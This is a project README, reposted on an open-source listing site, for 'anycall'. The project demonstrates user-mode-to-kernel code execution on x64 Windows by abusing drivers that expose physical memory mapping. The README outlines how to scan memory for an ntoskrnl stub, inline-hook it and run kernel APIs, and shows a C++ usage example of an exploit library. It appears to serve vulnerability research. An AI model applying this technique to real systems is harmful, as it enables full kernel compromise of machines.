Anycall Save
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
Project README
anycall
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
Read: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html
How it works
- Allocate physical memory to user virtual memory
- Allows user-process to manupulate arbitrary physical memory without calling APIs
- Search entire physical memory until we found function stub to hook, in
ntoskrnl.exephysical memory - Once the stub found, place inline-hook on the stub
- simply
jmp rax, detour address could be anything we want to invoke
- simply
-
syscallit - wow, we are
user-modebut able to call kernel APIs
Goal of this project
This project is to demonstrate how drivers that allowing user-process to map physical memory for user, and how it is critical vulnerable.
Related CVEs:
libanycall
libanycall is the powerful c++ static-library that makes exploit execution of anycall more easily.
Usage
- link it (e.g,
#pragma comment( lib, "libanycall64" )) - include (e.g,
#include "libanycall.h")
For example:
#include <windows.h>
#include <iostream>
#include "libanycall.h"
#pragma comment( lib, "libanycall64" )
using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );
int main( const int argc, const char** argv, const char** envp )
{
if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
{
printf( "[!] failed to init libanycall\n" );
return EXIT_FAILURE;
}
// invoke NT kernel APIs from usermode
const uint32_t process_id =
( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );
printf( "PsGetCurrentProcessId returns %d\n", process_id );
return EXIT_SUCCESS;
}
License
MIT
Open Source Agenda is not affiliated with "Anycall" Project. README Source: kkent030315/anycall
Stars
214
Open Issues
2
Last Commit
1 year ago
Repository
License
Open Source Agenda Badge
